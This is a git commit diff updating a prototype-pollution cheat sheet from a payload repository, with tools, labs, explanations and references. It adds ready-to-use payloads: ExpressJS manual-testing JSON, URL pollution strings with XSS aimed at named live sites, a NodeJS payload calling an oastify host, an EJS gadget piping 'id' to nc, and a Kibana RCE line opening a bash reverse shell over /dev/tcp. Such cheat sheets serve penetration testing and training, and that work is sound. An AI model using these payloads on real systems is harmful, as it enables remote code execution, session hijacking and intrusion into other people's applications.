mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Merge pull request #686 from swisskyrepo/prototype-pollution
Prototype Pollution Update
This commit is contained in:
commit
0f085798c7
@ -9,26 +9,45 @@
|
||||
* [Labs](#labs)
|
||||
* [Exploit](#exploit)
|
||||
* [Examples](#examples)
|
||||
* [Prototype pollution via JSON input](#prototype-pollution-via-json-input)
|
||||
* [Prototype pollution payloads](#prototype-pollution-payloads)
|
||||
* [Manual Testing](#manual-testing)
|
||||
* [Prototype Pollution via JSON input](#prototype-pollution-via-json-input)
|
||||
* [Prototype Pollution in URL](#prototype-pollution-in-url)
|
||||
* [Prototype Pollution Payloads](#prototype-pollution-payloads)
|
||||
* [Prototype Pollution Gadgets](#prototype-pollution-gadgets)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
* [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder) - Help you find gadget for prototype pollution exploitation
|
||||
|
||||
* [yuske/silent-spring](https://github.com/yuske/silent-spring) - Prototype Pollution Leads to Remote Code Execution in Node.js
|
||||
* [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) - Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages
|
||||
* [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution) - Prototype Pollution and useful Script Gadgets
|
||||
* [portswigger/server-side-prototype-pollution](https://github.com/portswigger/server-side-prototype-pollution) - Burp Suite Extension detectiong Prototype Pollution vulnerabilities
|
||||
* [msrkp/PPScan](https://github.com/msrkp/PPScan)
|
||||
|
||||
## Labs
|
||||
|
||||
* [YesWeHack Dojo - Prototype Pollution](https://dojo-yeswehack.com/XSS/Training/Prototype-Pollution)
|
||||
* [PortSwigger - Prototype pollution](https://portswigger.net/web-security/all-labs#prototype-pollution)
|
||||
* [PortSwigger - Prototype Pollution](https://portswigger.net/web-security/all-labs#prototype-pollution)
|
||||
|
||||
|
||||
## Exploit
|
||||
|
||||
In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of `Object.prototype`, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.
|
||||
|
||||
```js
|
||||
var myDog = new Dog();
|
||||
|
||||
// Points to the function "Dog"
|
||||
myDog.constructor;
|
||||
|
||||
// Points to the class definition of "Dog"
|
||||
myDog.constructor.prototype;
|
||||
myDog.__proto__;
|
||||
myDog["__proto__"];
|
||||
```
|
||||
|
||||
|
||||
### Examples
|
||||
|
||||
@ -44,9 +63,21 @@ In JavaScript, prototypes are what allow objects to inherit features from other
|
||||
```
|
||||
|
||||
|
||||
### Prototype pollution via JSON input
|
||||
### Manual Testing
|
||||
|
||||
* ExpressJS: `{ "__proto__":{"parameterLimit":1}}` + 2 parameters in GET request, at least 1 must be reflected in the response.
|
||||
* ExpressJS: `{ "__proto__":{"ignoreQueryPrefix":true}}` + `??foo=bar`
|
||||
* ExpressJS: `{ "__proto__":{"allowDots":true}}` + `?foo.bar=baz`
|
||||
* Change the padding of a JSON response: `{ "__proto__":{"json spaces":" "}}` + `{"foo":"bar"}`, the server should return `{"foo": "bar"}`
|
||||
* Modify CORS header responses: `{ "__proto__":{"exposedHeaders":["foo"]}}`, the server should return the header `Access-Control-Expose-Headers`.
|
||||
* Change the status code: `{ "__proto__":{"status":510}}`
|
||||
|
||||
|
||||
### Prototype Pollution via JSON input
|
||||
|
||||
You can access the prototype of any object via the magic property `__proto__`.
|
||||
The `JSON.parse()` function in JavaScript is used to parse a JSON string and convert it into a JavaScript object. Typically it is a sink function where prototype pollution can happen.
|
||||
|
||||
You can access the prototype of any object via the magic property `__proto__`.
|
||||
|
||||
```js
|
||||
{
|
||||
@ -56,8 +87,56 @@ You can access the prototype of any object via the magic property `__proto__`.
|
||||
}
|
||||
```
|
||||
|
||||
Asynchronous payload for NodeJS.
|
||||
|
||||
### Prototype pollution payloads
|
||||
```js
|
||||
{
|
||||
"__proto__": {
|
||||
"argv0":"node",
|
||||
"shell":"node",
|
||||
"NODE_OPTIONS":"--inspect=payload\"\".oastify\"\".com"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
### Prototype Pollution in URL
|
||||
|
||||
Example of Prototype Pollution payloads found in the wild.
|
||||
|
||||
```ps1
|
||||
https://victim.com/#a=b&__proto__[admin]=1
|
||||
https://example.com/#__proto__[xxx]=alert(1)
|
||||
http://server/servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E
|
||||
https://www.apple.com/shop/buy-watch/apple-watch?__proto__[src]=image&__proto__[onerror]=alert(1)
|
||||
https://www.apple.com/shop/buy-watch/apple-watch?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)
|
||||
```
|
||||
|
||||
|
||||
### Prototype Pollution Exploitation
|
||||
|
||||
Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary.
|
||||
|
||||
* Remote Command Execution: [RCE in Kibana (CVE-2019-7609)](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
|
||||
```js
|
||||
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
|
||||
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
|
||||
```
|
||||
* Remote Command Execution: [RCE using EJS gadgets](https://mizu.re/post/ejs-server-side-prototype-pollution-gadgets-to-rce)
|
||||
```js
|
||||
{
|
||||
"__proto__": {
|
||||
"client": 1,
|
||||
"escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | nc localhost 4444')"
|
||||
}
|
||||
}
|
||||
```
|
||||
* Reflected XSS: [Reflected XSS on www.hackerone.com via Wistia embed code - #986386](https://hackerone.com/reports/986386)
|
||||
* Client-side bypass: [Prototype pollution – and bypassing client-side HTML sanitizers](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
|
||||
* Deny of Service
|
||||
|
||||
|
||||
### Prototype Pollution Payloads
|
||||
|
||||
```js
|
||||
Object.__proto__["evilProperty"]="evilPayload"
|
||||
@ -65,14 +144,36 @@ Object.__proto__.evilProperty="evilPayload"
|
||||
Object.constructor.prototype.evilProperty="evilPayload"
|
||||
Object.constructor["prototype"]["evilProperty"]="evilPayload"
|
||||
{"__proto__": {"evilProperty": "evilPayload"}}
|
||||
{"__proto__.name":"test"}
|
||||
x[__proto__][abaeead] = abaeead
|
||||
x.__proto__.edcbcab = edcbcab
|
||||
__proto__[eedffcb] = eedffcb
|
||||
__proto__.baaebfc = baaebfc
|
||||
?__proto__[test]=test
|
||||
```
|
||||
|
||||
|
||||
### Prototype Pollution Gadgets
|
||||
|
||||
A "gadget" in the context of vulnerabilities typically refers to a piece of code or functionality that can be exploited or leveraged during an attack. When we talk about a "prototype pollution gadget," we're referring to a specific code path, function, or feature of an application that is susceptible to or can be exploited through a prototype pollution attack.
|
||||
|
||||
Either create your own gadget using part of the source with [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder), or try to use already discovered gadgets [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) / [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution).
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
|
||||
* [Prototype Pollution and Where to Find Them - BitK & SakiiR - AUGUST 14, 2023](https://youtu.be/mwpH9DF_RDA)
|
||||
* [Prototype Pollution - PortSwigger](https://portswigger.net/web-security/prototype-pollution)
|
||||
* [A Pentester’s Guide to Prototype Pollution Attacks - HARSH BOTHRA - JAN 2, 2023](https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks)
|
||||
* [A tale of making internet pollution free - Exploiting Client-Side Prototype Pollution in the wild - s1r1us](https://blog.s1r1us.ninja/research/PP)
|
||||
* [Detecting Server-Side Prototype Pollution - Daniel Thatcher - February 15, 2023](https://www.intruder.io/research/server-side-prototype-pollution)
|
||||
* [Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - MICHAŁ BENTKOWSKI - October 30, 2019](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
|
||||
* [NodeJS - __proto__ & prototype Pollution - HackTricks](https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution)
|
||||
* [Prototype Pollution - PortSwigger](https://portswigger.net/web-security/prototype-pollution)
|
||||
* [Prototype pollution - Snyk](https://learn.snyk.io/lessons/prototype-pollution/javascript/)
|
||||
* [NodeJS - __proto__ & prototype Pollution - HackTricks](https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution)
|
||||
* [Prototype pollution and bypassing client-side HTML sanitizers - MICHAŁ BENTKOWSKI - August 18, 2020](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
|
||||
* [Prototype Pollution and Where to Find Them - BitK & SakiiR - AUGUST 14, 2023](https://youtu.be/mwpH9DF_RDA)
|
||||
* [Prototype Pollution Attack in NodeJS - Olivier Arteau](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)
|
||||
* [Prototype pollution attacks in NodeJS applications - Olivier Arteau - Youtube](https://youtu.be/LUsiFV3dsK8)
|
||||
* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4)
|
||||
* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
|
||||
* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution)
|
||||
* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
|
Loading…
Reference in New Issue
Block a user